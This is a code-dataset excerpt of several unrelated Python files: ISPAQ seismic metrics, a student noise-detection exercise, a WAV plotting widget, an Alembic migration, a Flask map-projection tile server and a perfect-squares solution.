*metric will not run with this version of ISPAQ*\")\n else:\n if function_name not in ispaq_dict[bLogic]:\n metricList.append(metric_name + \" *metric will not run with this version of ISPAQ*\")\n else:\n metricList.append(metric_name)\n for line in sorted(metricList):\n print(line)\n sys.exit(0)\n\n\n # Load additional modules --------------------------------------------------\n\n # These are loaded here so that asking for --version or --help is not bogged down\n # by the slow-to-load modules that require matplotlib\n\n # ISPAQ modules\n from .user_request import UserRequest\n from .concierge import Concierge, NoAvailableDataError\n from . import irisseismic\n from . import irismustangmetrics\n from . import utils\n \n # Specific ISPAQ business logic\n from .simple_metrics import simple_metrics\n from .SNR_metrics import SNR_metrics\n from .PSD_metrics import PSD_metrics\n from .crossTalk_metrics import crossTalk_metrics\n from .pressureCorrelation_metrics import pressureCorrelation_metrics\n from .crossCorrelation_metrics import crossCorrelation_metrics\n from .orientationCheck_metrics import orientationCheck_metrics\n from .transferFunction_metrics import transferFunction_metrics\n from .sampleRate_metrics import sampleRate_metrics\n\n if (StrictVersion(obspy.__version__) < StrictVersion(\"1.2.2\")):\n print(\"Please update ObsPy version \" + str(obspy.__version__) + \" to version 1.2.2\")\n message = \"Would you like to update obspy now? [y]/n: \"\n answer = raw_input(message).lower()\n accepted_answer = ['','yes','y']\n rejected_answer = ['n','no']\n while ((answer not in accepted_answer) and (answer not in rejected_answer)):\n print(\"Invalid choice: \" + answer)\n message = \"Would you like to update obspy now? [y]/n: \"\n answer = raw_input(message).lower()\n if answer in accepted_answer:\n subprocess.call(\"conda install -c conda-forge obspy=1.2.2\",shell=True)\n elif answer in rejected_answer:\n print(\"Exiting now without updating conda packages.\")\n raise SystemExit\n\n\n # Create UserRequest object ------------------------------------------------\n #\n # The UserRequest class is in charge of parsing arguments issued on the\n # command line, loading and parsing a preferences file, and setting a bunch\n # of properties that capture the totality of what the user wants in a single\n # invocation of the ISPAQ top level script.\n\n logger.debug('Creating UserRequest ...')\n try:\n user_request = UserRequest(args, logger=logger)\n except Exception as e:\n logger.debug(e)\n logger.critical(\"Failed to create UserRequest object\")\n raise SystemExit\n\n # Create Concierge (aka Expediter) -----------------------------------------\n #\n # The Concierge class uses the completely filled out UserRequest and has the\n # job of expediting requests for information that may be made by any of the\n # business_logic methods. The goal is to have business_logic methods that can\n # be written as clearly as possible without having to know about the intricacies\n # of ObsPy.\n \n logger.debug('Creating Concierge ...')\n try:\n concierge = Concierge(user_request=user_request, logger=logger)\n except Exception as e:\n logger.debug(e)\n logger.critical(\"Failed to create Concierge object\")\n raise SystemExit\n\n # Generate Simple Metrics --------------------------------------------------\n\n if 'simple' in concierge.logic_types:\n logger.debug('Inside simple business logic ...')\n try:\n df = simple_metrics(concierge)\n if df is None:\n logger.info('No simple metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_simpleMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing simple metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing simple metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'simple' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'simple' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'simple' metrics\")\n\n \n if 'sampleRate' in concierge.logic_types:\n logger.debug('Inside sampleRate business logic ...')\n try:\n df = sampleRate_metrics(concierge)\n if df is None:\n logger.info('No sampleRate metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_sampleRateMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing sampleRate metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing sampleRate metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'sampleRate' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'sampleRate' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'sampleRate' metrics\")\n\n # Generate SNR Metrics -----------------------------------------------------\n\n if 'SNR' in concierge.logic_types:\n logger.debug('Inside SNR business logic ...')\n try:\n df = SNR_metrics(concierge)\n if df is None:\n logger.info('No SNR metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_SNRMetrics.csv\"\n \n if concierge.output == 'csv':\n logger.info('Writing SNR metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing SNR metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'SNR' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'SNR' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'SNR' metrics\")\n\n\n # Generate PSD Metrics -----------------------------------------------------\n\n if 'PSD' in concierge.logic_types:\n logger.debug('Inside PSD business logic ...')\n try:\n df = PSD_metrics(concierge)\n if 'PSD' not in concierge.function_by_logic['PSD']:\n pass\n elif df is None:\n logger.info('No PSD metrics were calculated')\n else:\n try:\n # Write out the metrics\n filepath = concierge.output_file_base + \"_PSDMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing PSD metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing PSD metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'PSD' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'PSD' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'PSD' metrics\")\n\n\n # Generate Cross Talk Metrics ----------------------------------------------\n\n if 'crossTalk' in concierge.logic_types:\n logger.debug('Inside crossTalk business logic ...')\n try:\n df = crossTalk_metrics(concierge)\n if df is None:\n logger.info('No crossTalk metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_crossTalkMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing crossTalk metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing crossTalk metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'crossTalk' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'crossTalk' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'crossTalk' metrics\")\n \n\n # Generate Pressure Correlation Metrics ----------------------------------------------\n\n if 'pressureCorrelation' in concierge.logic_types:\n logger.debug('Inside pressureCorrelation business logic ...')\n try:\n df = pressureCorrelation_metrics(concierge)\n if df is None:\n logger.info('No pressureCorrelation metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_pressureCorrelationMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing pressureCorrelation metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing pressureCorrelation metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'pressureCorrelation' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'pressureCorrelation' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'pressureCorrelation' metrics\")\n \n\n # Generate Cross Correlation Metrics ---------------------------------------\n\n if 'crossCorrelation' in concierge.logic_types:\n logger.debug('Inside crossCorrelation business logic ...')\n try:\n df = crossCorrelation_metrics(concierge)\n if df is None:\n logger.info('No crossCorrelation metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_crossCorrelationMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing crossCorrelation metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing crossCorrelation metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'crossCorrelation' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'crossCorrelation' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'crossCorrelation' metrics\")\n \n\n # Generate Orientation Check Metrics ---------------------------------------\n\n if 'orientationCheck' in concierge.logic_types:\n logger.debug('Inside orientationCheck business logic ...')\n try:\n df = orientationCheck_metrics(concierge)\n if df is None:\n logger.info('No orientationCheck metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_orientationCheckMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing orientationCheck metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing orientationCheck metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'orientationCheck' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'orientationCheck' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'orientationCheck' metrics\")\n \n \n # Generate Transfer Function Metrics ---------------------------------------\n\n if 'transferFunction' in concierge.logic_types:\n logger.debug('Inside transferFunction business logic ...')\n try:\n df = transferFunction_metrics(concierge)\n if df is None:\n logger.info('No transferFunction metrics were calculated')\n else:\n try:\n filepath = concierge.output_file_base + \"_transferMetrics.csv\"\n if concierge.output == 'csv':\n logger.info('Writing transfer metrics to %s' % filepath)\n elif concierge.output == 'db':\n logger.info('Writing transferFunction metrics to %s' % concierge.db_name)\n utils.write_simple_df(df, filepath, concierge, sigfigs=concierge.sigfigs)\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error writing 'transferFunction' metric results\")\n except NoAvailableDataError as e:\n logger.info(\"No data available for 'transferFunction' metrics\")\n except Exception as e:\n logger.debug(e)\n logger.error(\"Error calculating 'transferFunction' metrics\")\n\n\n logger.info('ALL FINISHED!')\n\n\n# ------------------------------------------------------------------------------\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"iris-edu/ispaq","sub_path":"ispaq/ispaq.py","file_name":"ispaq.py","file_ext":"py","file_size_in_byte":27264,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"31353911403","text":"# coding: utf -8\n# PROG1 - UFCG\n# ALUNO: EMANUEL VINICIUS | DATA: 16/12/2021 \n# MATRICULA: 120210785\n# EXERCICIO: PROGRAMA QUE DETECTA PERTURBAÇÃO\n\n#|ENTRADAS|\nruido = input()\nhora = int(input())\n\n#|PROCESSAMENTO|\n\nif ruido != \"\" and hora > 22:\n mensagem = \"Perturbação Detectada!\"\nelse:\n mensagem = \"Condomínio em Paz.\"\n\nprint(mensagem)\n","repo_name":"EmanuelSal/Atividades_Programacao-1","sub_path":"questões_tst/sensor_ruidos/ruidos.py","file_name":"ruidos.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40072263192","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Widgets\nfrom PyQt5.QtWidgets import QWidget\n# Layouts\nfrom PyQt5.QtWidgets import QVBoxLayout\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom converter.gui_converter_common_widgets import MyNavigationToolbar2QT\n\nimport wave\nimport numpy as np\nfrom gui_common_widgets import MultiprocessingQTimer\n\n\ndef GetSignalTempToPlot(filename,SubSamplingRate=8000.0):\n with wave.open(filename,mode='rb') as wavefile:\n Fe = wavefile.getframerate()\n Te = 1.0/Fe\n NbSamples = wavefile.getnframes()\n nb_channels = wavefile.getnchannels()\n \n sampwidth = wavefile.getsampwidth()\n temp = wavefile.readframes(NbSamples)\n \n if sampwidth == 1:\n temp = np.fromstring(temp,dtype=np.int8)\n elif sampwidth == 2:\n temp = np.fromstring(temp,dtype=np.int16)\n elif sampwidth == 4:\n temp = np.fromstring(temp,dtype=np.int32)\n elif sampwidth == 8:\n temp = np.fromstring(temp,dtype=np.int64)\n else:\n print(\"The sampled width is not compatible: number of Bytes= %d\"%sampwidth)\n raise ValueError(\"The sample width of the wav file is not compatible with the application\")\n \n if(Fe>SubSamplingRate):\n BestError = np.inf\n BestInd = 1\n for div in range(2,10):\n error = np.abs(SubSamplingRate - 1.0/(Te*div))\n if(error < BestError):\n BestError = error\n BestInd = div\n \n NbSampFinal = int(NbSamples/(nb_channels*BestInd))\n xData = np.arange(0,NbSampFinal)*(Te*BestInd)\n yData = np.zeros(NbSampFinal,dtype=temp.dtype)\n for k in range(0,NbSampFinal):\n samps = temp[k*BestInd*nb_channels:(k*BestInd+1)*nb_channels].astype(np.float)\n yData[k] = np.round(np.mean(samps)).astype(temp.dtype)\n else:\n NbSampFinal = int(NbSamples/nb_channels)\n xData = np.arange(0,NbSampFinal)*Te\n yData = np.zeros(NbSampFinal,dtype=temp.dtype)\n for k in range(0,NbSampFinal):\n samps = temp[k*nb_channels:(k+1)*nb_channels].astype(np.float)\n yData[k] = np.round(np.mean(samps)).astype(temp.dtype)\n return({'x':xData,'y':yData})\n \n\nclass PlotStep1Widget(QWidget):\n def __init__(self, parent):\n QWidget.__init__(self, parent)\n # Attributes\n self.parent = parent\n self.ParametersManager = parent.ParametersManager\n self.figure = Figure()\n self.canvas = FigureCanvas(self.figure)\n self.toolbar = MyNavigationToolbar2QT(self.canvas, self)\n # set the layout\n mainLayout = QVBoxLayout()\n mainLayout.addWidget(self.toolbar)\n mainLayout.addWidget(self.canvas)\n self.setLayout(mainLayout)\n # Initialization\n self.resetView()\n self.ProcessForPlotting = MultiprocessingQTimer(500)\n self.ProcessForPlotting.finished.connect(self.plotSignalTemp)\n \n def resetView(self):\n self.figure.clf()\n self.ax1 = self.figure.add_subplot(211)\n self.ax1.set_ylabel(\"Amplitude\")\n self.lineStart = self.ax1.axvline(0,linestyle='--',color='r')\n self.lineEnd = self.ax1.axvline(0,linestyle='--',color='r')\n self.lineStart.set_visible(False)\n self.lineEnd.set_visible(False)\n self.ax2 = self.figure.add_subplot(212,sharex=self.ax1)\n self.ax2.set_ylabel(\"Pitch\")\n self.ax2.set_xlabel(\"Time [s]\")\n self.ax1.grid()\n self.ax2.grid()\n self.resultPlot = self.ax2.plot([],[])[0]\n self.figure.set_tight_layout('tight')\n \n def UpdateVlineStart(self,x_lineStart):\n if(x_lineStart is not None):\n self.lineStart.set_xdata(x_lineStart)\n self.lineStart.set_visible(True)\n self.canvas.draw_idle()\n else:\n self.lineStart.set_visible(False)\n \n def UpdateVlineEnd(self,x_lineEnd):\n if(x_lineEnd is not None):\n self.lineEnd.set_xdata(x_lineEnd)\n self.lineEnd.set_visible(True)\n self.canvas.draw_idle()\n else:\n self.lineEnd.set_visible(False)\n \n def plotSignalTemp(self):\n x = self.ProcessForPlotting.results['x']\n y = self.ProcessForPlotting.results['y']\n self.ax1.plot(x,y)\n self.canvas.draw_idle()\n \n def plotResults(self,OutputStep1):\n x = np.arange(len(OutputStep1['pitch_st']))*OutputStep1['te_s']\n y = OutputStep1['pitch_st']\n self.resultPlot.set_data(x,y)\n self.ax2.relim()\n self.ax2.autoscale_view()\n self.canvas.draw_idle()\n \n def InitView(self,filename):\n self.ProcessForPlotting.start(GetSignalTempToPlot,(filename,))\n \n","repo_name":"Niicoo/scorelisto-python-gui","sub_path":"converter/step1/gui_plot_step1_widget.py","file_name":"gui_plot_step1_widget.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71099298292","text":"\"\"\"bundle is_complete\n\nRevision ID: ff7b2a6133b3\nRevises: 9e4328c625f8\nCreate Date: 2022-08-05 09:38:57.514862\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = 'ff7b2a6133b3'\ndown_revision = '9e4328c625f8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('invoice_bundle', sa.Column('is_complete', sa.Boolean(), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('invoice_bundle', 'is_complete')\n # ### end Alembic commands ###\n","repo_name":"vrcompugo/EV-Manager-Data-API","sub_path":"migrations/versions/ff7b2a6133b3_bundle_is_complete.py","file_name":"ff7b2a6133b3_bundle_is_complete.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4438209787","text":"import json\nimport os\nfrom io import BytesIO\nfrom typing import Dict, Type\n\nimport math\nfrom flask import Flask, send_file, request, abort, Response, jsonify\nfrom flask_caching import Cache\nimport logging\n\nfrom flask_cors import CORS, cross_origin\n\nfrom source.complex_log_projection import ComplexLogProjection\nfrom source.lat_lng import LatLng\nfrom source.raster_data.abstract_raster_data_provider import AbstractRasterDataProvider\nfrom source.cache_settings import build_cache_config, make_url_cache_key\nfrom source.raster_data.remote_raster_data_provider import RemoteRasterDataProvider\nfrom source.raster_projector import RasterProjector, TargetSectionDescription\nfrom source.smoothing_functions import CosCutoffSmoothingFunction, AbstractSmoothingFunction, DualCosSmoothingFunction\nfrom source.raster_data.tile_resolver import TileURLResolver\nfrom PIL import Image\nfrom source.flat_tiling import FlatTiling\nfrom server_timing import Timing\nimport numpy as np\n\napp = Flask(__name__)\nlogging.basicConfig(level=logging.INFO)\napp.config.from_mapping(build_cache_config())\ncache = Cache(app)\nCORS(app)\nt = Timing(app,force_debug=True)\n\nfrom source.hard_coded_providers import get_providers\n\nproviders = get_providers()\n\n\ndef do_projection(lat1, lng1, lat2, lng2, data_source: AbstractRasterDataProvider, pixel_width=256, pixel_height=256,\n xmin=-1, xmax=1, ymin=-1,\n ymax=1,\n cutoff=math.pi / 6,\n smoothing=CosCutoffSmoothingFunction,\n fileformat='png'\n ):\n with t.time(\"setup\"):\n trange = TargetSectionDescription(xmin, xmax, pixel_width, ymin, ymax, pixel_height)\n c1 = LatLng(lat1, lng1)\n c2 = LatLng(lat2, lng2)\n proj = ComplexLogProjection(c1, c2, cutoff,\n smoothing_function_type=smoothing)\n projector = RasterProjector(proj, data_source)\n\n with t.time(\"projection\"):\n d = projector.project(trange)\n with t.time(\"parse_result\"):\n pilim = Image.fromarray(d)\n with t.time(\"convert_to_format\"):\n img_io = BytesIO()\n pilim.save(img_io,fileformat)\n img_io.seek(0)\n return send_file(img_io, mimetype='image/'+fileformat)\n\n\n# sample http://127.0.0.1:5000/projection/lat1/10.0/lng1/10.0/lat2/0.0/lng2/0.0.png\n@app.route(\n \"/projection/lat1//lng1//\" +\n \"lat2//lng2/.png\")\n\ndef projection(lat1, lng1, lat2, lng2):\n additional_dict = parse_request_args(request.args)\n additional_dict.update(parse_angle(request.args))\n data_source = parse_source(request.args)\n return do_projection(lat1, lng1, lat2, lng2, data_source, **additional_dict)\n\n\ntiling = FlatTiling(3 * math.pi)\n\n\n@app.route(\n \"/tile/lat1//lng1//\" +\n \"lat2//lng2//cutoff//smoothing////.\")\n@cache.cached(timeout=60*60*24*7,key_prefix=make_url_cache_key)\ndef tile(lat1, lng1, lat2, lng2, cutoff, smoothing, zoom, x, y,fileformat):\n allowed_formats = [\"png\",\"webp\"]\n if fileformat not in allowed_formats:\n return \"file format needs to by of type \" + str(allowed_formats), 400\n xmin, ymin, xmax, ymax = tiling(x, y, zoom)\n ad = {}\n logging.info(\"Rendering tile with ({0},{1}) to ({2},{3})\".format(xmin, ymin, xmax, ymax))\n source = parse_source(request.args)\n\n for i in range(5):\n try:\n projected = do_projection(lat1, lng1, lat2, lng2, source, xmin=xmin, ymin=ymin, xmax=xmax, ymax=ymax,cutoff= math.radians(cutoff),smoothing=parse_smoothing(smoothing),fileformat=fileformat)\n return projected\n except ConnectionError as e:\n logging.warning(e)\n\n logging.warning(request.url +\" \"+ str(request.args) + \"could not be resolved!\")\n return \"\" ,500\n\n\n@app.route(\n \"/resolve/lat1//lng1//\" +\n \"lat2//lng2//cutoff//smoothing/\"+\n \"/clickLat//clickLng/.json\")\ndef resolve(lat1, lng1, lat2, lng2, cutoff, smoothing, clickLat, clickLng):\n proj = ComplexLogProjection(LatLng(lat1, lng1), LatLng(lat2, lng2), math.radians(cutoff),\n smoothing_function_type=parse_smoothing(smoothing))\n\n x, y = tiling.from_leaflet_LatLng(LatLng(clickLat, clickLng))\n\n xy = np.array([[x], [y]])\n latlng_data = proj.invert(xy)\n\n\n assert latlng_data.shape == (2, 1)\n ret_data = {\"lat\": latlng_data[0, 0], \"lng\": latlng_data[1, 0]}\n response = app.response_class(\n response=json.dumps(ret_data),\n status=200,\n mimetype='application/json'\n )\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Headers', 'Content-Type,Authorization')\n response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\n return response\n\n\n@app.route(\n \"/from_leaflet/lat1//lng1//\" +\n \"lat2//lng2//cutoff//smoothing/.json\",methods=['POST', 'GET'])\n@cross_origin(origin='*',headers=['access-control-allow-origin','Content-Type'])\ndef from_leaflet(lat1, lng1, lat2, lng2, cutoff, smoothing):\n\n if request.method != \"POST\":\n return \"\"\n\n json_i = request.get_json(force=True)\n if json_i is None:\n return \"Could not parse JSON\",500\n\n\n\n proj = ComplexLogProjection(LatLng(lat1, lng1), LatLng(lat2, lng2), math.radians(cutoff),\n smoothing_function_type=parse_smoothing(smoothing))\n\n elements = json_i['data']\n ret_v = []\n for e in elements:\n x, y = tiling.from_leaflet_LatLng(LatLng(e['lat'], e['lng']))\n xy = np.array([[x], [y]])\n latlng_data = proj.invert(xy)\n assert latlng_data.shape == (2, 1)\n ret_element = {\"lat\": latlng_data[0, 0], \"lng\": latlng_data[1, 0]}\n ret_v.append(ret_element)\n response = app.response_class(\n response=json.dumps({\"data\":ret_v}),\n status=200,\n mimetype='application/json'\n )\n\n return response\n\n\n@app.route(\n \"/to_leaflet/lat1//lng1//\" +\n \"lat2//lng2//cutoff//smoothing/.json\",methods=['POST', 'GET'])\n@cross_origin()\ndef to_leaflet(lat1, lng1, lat2, lng2, cutoff, smoothing):\n\n if request.method != \"POST\":\n return \"\"\n\n json_i = request.get_json(force=True)\n if json_i is None:\n return \"Could not parse JSON\",500\n\n precision = int(request.args.get(\"precision\",5)) # number of digits\n c1latlng = LatLng(lat1, lng1)\n c2latlng = LatLng(lat2, lng2)\n\n proj = ComplexLogProjection(c1latlng,c2latlng , math.radians(cutoff),\n smoothing_function_type=parse_smoothing(smoothing))\n\n center_distance = c1latlng.distanceTo(c2latlng)\n pixel_per_m = 256.0/(156412.0)\n elements = json_i['data']\n ret_v = []\n for e in elements:\n xy = np.array([[e[0]], [e[0]]])\n xy,clipping = proj(xy,calculate_clipping=True)\n z = proj.getZoomLevel(xy,pixel_per_m)\n latlng = tiling.to_leaflet_LatLng(xy[0,0],xy[1,0])\n\n clipping = bool(clipping[0])\n\n ret_element = [ round(latlng.lat,precision), round(latlng.lng,precision),round(z[0],precision),clipping]\n ret_v.append(ret_element)\n\n z_values = list(map(lambda x:x[2],ret_v))\n min_z = min(*z_values)\n max_z = max(*z_values)\n response = app.response_class(\n response=json.dumps({\"data\":ret_v,\"min_z\":min_z,\"max_z\":max_z},check_circular=False,indent=None),\n status=200,\n mimetype='application/json'\n )\n\n return response\n\ndef get_cities():\n\n cities_cache_key = \"cities_cache_key\"\n with t.time(\"checking_cities_cache\"):\n cached_v = cache.get(cities_cache_key)\n if cached_v is not None:\n with t.time(\"loading_cities_cache\"):\n return cached_v\n\n with t.time(\"loading_cities_from_file\"):\n cities_path = os.path.join(os.path.dirname(__file__),'..',\"cities.json\")\n with open(cities_path,'rb') as f:\n cities_parsed = json.load(f)\n\n named_cities = list(filter(lambda x:\"name\" in x['tags'],cities_parsed['elements']))\n\n cities_parsed['elements'] = list(map(lambda x:{\n \"lat\":x['lat'],\n \"lon\":x['lon'],\n \"type\":x['type'],\n \"tags\":{\n \"name\":x[\"tags\"][\"name\"],\n \"population\":x['tags'].get(\"population\",0),\n \"place\":x['tags']['place']\n }\n },named_cities))\n with t.time(\"writing_cities_to_cache\"):\n cache.set(cities_cache_key,cities_parsed)\n return cities_parsed\n\n\n@app.route('/cities.json',methods=[\"GET\"])\n@cache.cached(timeout=60*60)\ndef cities():\n cities_static_string = json.dumps(get_cities(), check_circular=False)\n return app.response_class(\n response=cities_static_string,\n status=200,\n mimetype='application/json'\n )\n\n\n\n\n\n@app.route(\n \"/cities_projected/lat1//lng1//\" +\n \"lat2//lng2//cutoff//smoothing/.json\",methods=['POST', 'GET'])\n@cross_origin()\n@cache.cached(timeout=60*60*24,key_prefix=make_url_cache_key)\ndef cities_projected(lat1, lng1, lat2, lng2, cutoff, smoothing):\n\n with t.time(\"loading_cities_lat_lng\"):\n cities_lat_lng = np.array(list(map(lambda e: [e['lat'], e['lon']], get_cities()['elements']))).transpose()\n with t.time(\"parsing_params\"):\n precision = int(request.args.get(\"precision\",5)) # number of digits\n c1latlng = LatLng(lat1, lng1)\n c2latlng = LatLng(lat2, lng2)\n\n proj = ComplexLogProjection(c1latlng,c2latlng , math.radians(cutoff),\n smoothing_function_type=parse_smoothing(smoothing))\n\n center_distance = c1latlng.distanceTo(c2latlng)\n pixel_per_m = 256.0/(156412.0)\n num_cities = cities_lat_lng.shape[1]\n\n with t.time(\"projection\"):\n xy,clipping = proj(cities_lat_lng,calculate_clipping=True)\n with t.time(\"zoomlevel\"):\n z = proj.getZoomLevel(xy, pixel_per_m)\n with t.time(\"tiling\"):\n latlngs = [None] * num_cities\n for i in range(num_cities):\n\n latlng = tiling.to_leaflet_LatLng(xy[0,i],xy[1,i])\n latlngs[i]=latlng\n with t.time(\"packaging\"):\n ret_v = [None] * num_cities\n p_x_int = 10**precision\n p_x_float = 10.**precision\n my_round = lambda x:int(x*(p_x_int))/(p_x_float)\n for i in range(num_cities):\n clipping_v = bool(clipping[i])\n latlng = latlngs[i]\n ret_element = [ my_round(latlng.lat), my_round(latlng.lng),my_round(z[i]),clipping_v]\n ret_v[i] =ret_element\n\n with t.time(\"assembly\"):\n z_values = list(map(lambda x:x[2],ret_v))\n min_z = min(*z_values)\n max_z = max(*z_values)\n response = app.response_class(\n response=json.dumps({\"data\":ret_v,\"min_z\":min_z,\"max_z\":max_z},check_circular=False,indent=None),\n status=200,\n mimetype='application/json'\n )\n return response\n\n@app.route(\"/providers\")\ndef fetch_providers():\n p = get_providers()\n out_dict ={}\n for prov_name,prov_data in p.items():\n if isinstance(prov_data,RemoteRasterDataProvider):\n prov_data_r : RemoteRasterDataProvider = prov_data\n res:TileURLResolver = prov_data_r.resolver\n\n out_dict[prov_name] =res.normalized()\n\n response = jsonify(out_dict)\n return add_cors_headers(response)\n\ndef parse_request_args(args: request) -> Dict:\n additional_dict = {}\n if 'width' in args:\n additional_dict['pixel_width'] = int(args['width'])\n\n if 'height' in args:\n additional_dict['pixel_height'] = int(args['height'])\n\n if 'sizex' in args:\n v = float(args['sizex'])\n additional_dict['xmin'] = -v\n additional_dict['xmax'] = v\n\n if 'sizey' in args:\n v = float(args['sizey'])\n additional_dict['ymin'] = -v\n additional_dict['ymax'] = v\n\n\n\ndef parse_angle(args) -> Dict:\n additional_dict = {}\n # cutoff is provided as degree\n if 'cutoff' in args:\n v = abs(float(args['cutoff']) * math.pi / 180)\n additional_dict['cutoff'] = v\n\n return additional_dict\n\ndef parse_source(args) -> AbstractRasterDataProvider:\n data_source = providers.get(\"default\", None)\n if 'source' in args:\n v = args['source']\n if v not in providers:\n return abort(Response(\"invalid source\"))\n data_source = providers.get(v, None)\n\n if data_source is None:\n abort(Response(\"No data source set\"))\n return data_source\n\ndef parse_smoothing(smoothing) -> Type[AbstractSmoothingFunction]:\n types = {\n \"cos\":CosCutoffSmoothingFunction,\n \"dualcos\":DualCosSmoothingFunction\n }\n\n if smoothing in types:\n return types[smoothing]\n\n raise Exception(\"Invalid smoothing type \" + smoothing)\n\n\n\n@app.route('/test')\ndef test():\n args = request.args\n return json.dumps(args)\n\n\ndef add_cors_headers(response):\n response.headers.add('Access-Control-Allow-Origin', '*')\n response.headers.add('Access-Control-Allow-Headers', '*')\n response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE,OPTIONS')\n return response","repo_name":"saildeep/master_backend","sub_path":"source/webserver.py","file_name":"webserver.py","file_ext":"py","file_size_in_byte":13860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32518597929","text":"#!/usr/bin/env python2.7\n\n\n'''\nGiven a positive integer n, find the least number of\nperfect square numbers (for example, 1, 4, 9, 16, ...) which sum to n.\n\nFor example, given n = 12, return 3 because 12 = 4 + 4 + 4; given n = 13, return 2 because 13 = 4 + 9.\n'''\n\nimport math\n\nclass Solution(object):\n def num_of_squares(self, n):\n while n % 4 == 0:\n n /= 4\n if n % 8 == 7:\n return 4\n a = 0\n while a*a <= n:\n b = int(math.sqrt(n - a*a))\n if a*a + b*b == n:\n if a > 0 and b > 0:\n return 2\n else:\n return 1\n a += 1\n return 3","repo_name":"fifa007/Leetcode","sub_path":"src/perfect_squares.py","file_name":"perfect_squares.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} 